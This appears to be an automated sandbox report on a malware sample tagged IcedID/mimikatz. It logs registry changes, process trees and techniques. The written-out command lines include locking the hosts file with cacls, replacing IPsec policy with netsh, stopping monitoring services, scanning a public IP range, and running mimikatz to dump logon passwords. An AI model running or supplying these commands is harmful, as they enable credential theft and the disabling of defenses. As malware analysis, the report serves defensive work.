wooakm.execmd.exenetsh.execmd.execmd.exeysesbhsym.execmd.execmd.exewpcap.exenet.execmd.exenet.exelebulsi.exenetsh.exenet1.exenet.exeschtasks.execmd.exesc.execacls.exePING.EXEnet.exenet.execacls.execmd.exenet.exenetsh.exesc.exenet.execmd.execacls.exenet1.exebdltnuisb.execmd.execmd.execmd.exenet.exenetsh.exenetsh.execmd.exenetsh.exenetsh.exenetsh.exenetsh.execmd.execmd.execmd.exenet1.exenetsh.exenet1.execmd.exenet1.execacls.exenet1.execmd.execmd.execmd.exesc.execacls.exenet.exenet.exe2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.execmd.exenetsh.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wooakm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ysesbhsym.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lebulsi.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bdltnuisb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 3360 cmd.exe 1212 PING.EXE -
NSIS installer 3 IoCs
Processes:
resource yara_rule behavioral2/files/0x000a000000023ca8-6.dat nsis_installer_2 behavioral2/files/0x0011000000023ccd-14.dat nsis_installer_1 behavioral2/files/0x0011000000023ccd-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
Processes:
sadefbibf.exesadefbibf.exesadefbibf.exelebulsi.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing lebulsi.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" lebulsi.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump sadefbibf.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" sadefbibf.exe -
Modifies registry class 14 IoCs
Processes:
lebulsi.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" lebulsi.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" lebulsi.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" lebulsi.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid Process 4428 schtasks.exe 3188 schtasks.exe 376 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
lebulsi.exepid Process 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe -
Suspicious behavior: LoadsDriver 15 IoCs
Processes:
pid Process 656 656 656 656 656 656 656 656 656 656 656 656 656 656 656 -
Suspicious behavior: RenamesItself 1 IoCs
Processes:
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exepid Process 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exelebulsi.exelebulsi.exevfshost.exesadefbibf.exeuuetgf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exesadefbibf.exedescription pid Process Token: SeDebugPrivilege 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3224 lebulsi.exe Token: SeDebugPrivilege 348 lebulsi.exe Token: SeDebugPrivilege 1808 vfshost.exe Token: SeDebugPrivilege 1828 sadefbibf.exe Token: SeLockMemoryPrivilege 1240 uuetgf.exe Token: SeLockMemoryPrivilege 1240 uuetgf.exe Token: SeDebugPrivilege 2368 sadefbibf.exe Token: SeDebugPrivilege 3608 sadefbibf.exe Token: SeDebugPrivilege 3216 sadefbibf.exe Token: SeDebugPrivilege 3908 sadefbibf.exe Token: SeDebugPrivilege 1940 sadefbibf.exe Token: SeDebugPrivilege 2036 sadefbibf.exe Token: SeDebugPrivilege 4368 sadefbibf.exe Token: SeDebugPrivilege 3192 sadefbibf.exe Token: SeDebugPrivilege 1452 sadefbibf.exe Token: SeDebugPrivilege 1632 sadefbibf.exe Token: SeDebugPrivilege 2176 sadefbibf.exe Token: SeDebugPrivilege 2212 sadefbibf.exe Token: SeDebugPrivilege 1616 sadefbibf.exe Token: SeDebugPrivilege 1416 sadefbibf.exe Token: SeDebugPrivilege 2036 sadefbibf.exe Token: SeDebugPrivilege 2348 sadefbibf.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exelebulsi.exelebulsi.exexohudmc.exewooakm.exelebulsi.exelebulsi.exepid Process 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe 3224 lebulsi.exe 3224 lebulsi.exe 348 lebulsi.exe 348 lebulsi.exe 2788 xohudmc.exe 1072 wooakm.exe 4520 lebulsi.exe 4520 lebulsi.exe 7036 lebulsi.exe 7036 lebulsi.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.execmd.exelebulsi.execmd.execmd.exewpcap.exenet.exenet.exenet.exedescription pid Process procid_target PID 4928 wrote to memory of 3360 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe 84 PID 4928 wrote to memory of 3360 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe 84 PID 4928 wrote to memory of 3360 4928 2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe 84 PID 3360 wrote to memory of 1212 3360 cmd.exe 86 PID 3360 wrote to memory of 1212 3360 cmd.exe 86 PID 3360 wrote to memory of 1212 3360 cmd.exe 86 PID 3360 wrote to memory of 3224 3360 cmd.exe 94 PID 3360 wrote to memory of 3224 3360 cmd.exe 94 PID 3360 wrote to memory of 3224 3360 cmd.exe 94 PID 348 wrote to memory of 708 348 lebulsi.exe 96 PID 348 wrote to memory of 708 348 lebulsi.exe 96 PID 348 wrote to memory of 708 348 lebulsi.exe 96 PID 708 wrote to memory of 4432 708 cmd.exe 98 PID 708 wrote to memory of 4432 708 cmd.exe 98 PID 708 wrote to memory of 4432 708 cmd.exe 98 PID 708 wrote to memory of 2732 708 cmd.exe 99 PID 708 wrote to memory of 2732 708 cmd.exe 99 PID 708 wrote to memory of 2732 708 cmd.exe 99 PID 708 wrote to memory of 448 708 cmd.exe 100 PID 708 wrote to memory of 448 708 cmd.exe 100 PID 708 wrote to memory of 448 708 cmd.exe 100 PID 708 wrote to memory of 2368 708 cmd.exe 101 PID 708 wrote to memory of 2368 708 cmd.exe 101 PID 708 wrote to memory of 2368 708 cmd.exe 101 PID 708 wrote to memory of 1944 708 cmd.exe 102 PID 708 wrote to memory of 1944 708 cmd.exe 102 PID 708 wrote to memory of 1944 708 cmd.exe 102 PID 708 wrote to memory of 1840 708 cmd.exe 103 PID 708 wrote to memory of 1840 708 cmd.exe 103 PID 708 wrote to memory of 1840 708 cmd.exe 103 PID 348 wrote to memory of 4144 348 lebulsi.exe 106 PID 348 wrote to memory of 4144 348 lebulsi.exe 106 PID 348 wrote to memory of 4144 348 lebulsi.exe 106 PID 348 wrote to memory of 1336 348 lebulsi.exe 108 PID 348 wrote to memory of 1336 348 lebulsi.exe 108 PID 348 wrote to memory of 1336 348 lebulsi.exe 108 PID 348 wrote to memory of 4076 348 lebulsi.exe 110 PID 348 wrote to memory of 4076 348 lebulsi.exe 110 PID 348 wrote to memory of 4076 348 lebulsi.exe 110 PID 348 wrote to memory of 4352 348 lebulsi.exe 113 PID 348 wrote to memory of 4352 348 lebulsi.exe 113 PID 348 wrote to memory of 4352 348 lebulsi.exe 113 PID 4352 wrote to memory of 4128 4352 cmd.exe 115 PID 4352 wrote to memory of 4128 4352 cmd.exe 115 PID 4352 wrote to memory of 4128 4352 cmd.exe 115 PID 4128 wrote to memory of 4760 4128 wpcap.exe 116 PID 4128 wrote to memory of 4760 4128 wpcap.exe 116 PID 4128 wrote to memory of 4760 4128 wpcap.exe 116 PID 4760 wrote to memory of 4604 4760 net.exe 118 PID 4760 wrote to memory of 4604 4760 net.exe 118 PID 4760 wrote to memory of 4604 4760 net.exe 118 PID 4128 wrote to memory of 3612 4128 wpcap.exe 119 PID 4128 wrote to memory of 3612 4128 wpcap.exe 119 PID 4128 wrote to memory of 3612 4128 wpcap.exe 119 PID 3612 wrote to memory of 4988 3612 net.exe 121 PID 3612 wrote to memory of 4988 3612 net.exe 121 PID 3612 wrote to memory of 4988 3612 net.exe 121 PID 4128 wrote to memory of 3628 4128 wpcap.exe 122 PID 4128 wrote to memory of 3628 4128 wpcap.exe 122 PID 4128 wrote to memory of 3628 4128 wpcap.exe 122 PID 3628 wrote to memory of 2036 3628 net.exe 124 PID 3628 wrote to memory of 2036 3628 net.exe 124 PID 3628 wrote to memory of 2036 3628 net.exe 124 PID 4128 wrote to memory of 1444 4128 wpcap.exe 125
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1776
-
C:\Windows\TEMP\eyuduassi\uuetgf.exe"C:\Windows\TEMP\eyuduassi\uuetgf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1240
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-21_9b11a4290496c5074abbe32a0baf7bb2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\seumlgyb\lebulsi.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1212
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3224
-
-
-
C:\Windows\seumlgyb\lebulsi.exeC:\Windows\seumlgyb\lebulsi.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:448
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:2368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1944
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1840
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4144
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1336
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4076
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
C:\Windows\zthyliniv\eftbbbiir\wpcap.exeC:\Windows\zthyliniv\eftbbbiir\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4604
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2036
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:1444 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4396
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2868 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4264 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:2872 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1140 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:4068
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3708 -
C:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exeC:\Windows\zthyliniv\eftbbbiir\bdltnuisb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zthyliniv\eftbbbiir\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1580
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zthyliniv\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3192 -
C:\Windows\zthyliniv\Corporate\vfshost.exeC:\Windows\zthyliniv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
